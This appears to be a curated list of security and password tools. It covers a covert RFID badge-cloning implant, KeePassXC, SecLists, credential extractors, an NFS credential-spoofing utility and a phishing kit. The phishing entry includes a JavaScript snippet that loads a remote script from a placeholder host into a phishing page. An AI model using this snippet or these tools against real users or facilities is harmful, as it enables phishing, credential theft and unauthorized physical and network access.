The Tick is the next evolution in covert access control system implants. Designed for a seamless integration behind card readers, The Tick silently intercepts, logs, and replays access credentials with greater efficiency and stealth than ever before. Compatible with a wide range of RFID systems, provides invaluable (to red teamers) insights into facility (in)security, while enabling advanced credential injection.
Once installed behind an access control unit, you can interact with it over Bluetooth or wifi to configure it, extract what it's captured so far, and upgrade the firmware.
Securely store passwords using industry standard encryption, quickly auto-type them into desktop applications, and use our browser extension to log into websites.
Complete database encryption using industry standard 256-bit AES. Fully compatible with KeePass Password Safe formats. Your password database works offline and requires no internet connection.
Every feature looks, feels, works, and is tested on Windows, macOS, and Linux. You can expect a seamless experience no matter which operating system you are using.
A plugin for Firefox that lets you interface with a KeepassXC password manager.
Note that this is an official KeepassXC project, not somebody's third party code.
Fish generator for phishers. Set it up someplace that supports PHP. Go to 3vil site. Open your browser's Javascript console. Paste this code, it will load the app.js and the dashboard:
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'https://where.i.installed.sink.example.com/app.js';
document.head.appendChild(script);vaults is a password manager featuring client side AES-256 encryption of passwords and notes, PBKDF2 hashing, vaults, and password generation. Separate vaults per user.
Front end, back end, and storage.
Requires PHP8 and MySQL v8. Says that it demands Docker but it can probably be built manually.
SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys, access tokens, authorizations, Javascript web tokens, and so forth in JavaScript files. It does so by using jsbeautifier for python in combination with a fairly large regular expression.
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. Some of this stuff can be used to prime discovery operations.
The Python keyring lib provides an easy way to access the system keyring service from python. It can be used in any application that needs safe password storage. Works with iOS Keychain, Freedesktop's Secret Service, KWallet 4 and 5, and Windows Credential Locker. Pluggable back-ends.
A utility used to extract user credentials and other secrets from the Windows registry hives offline.
A utility which uses the FUSE functionality of the Linux kernel to implement NFS in such a way that it can spoof user credentials when mounting exported file systems so you can get access to files that you wouldn't be able to otherwise.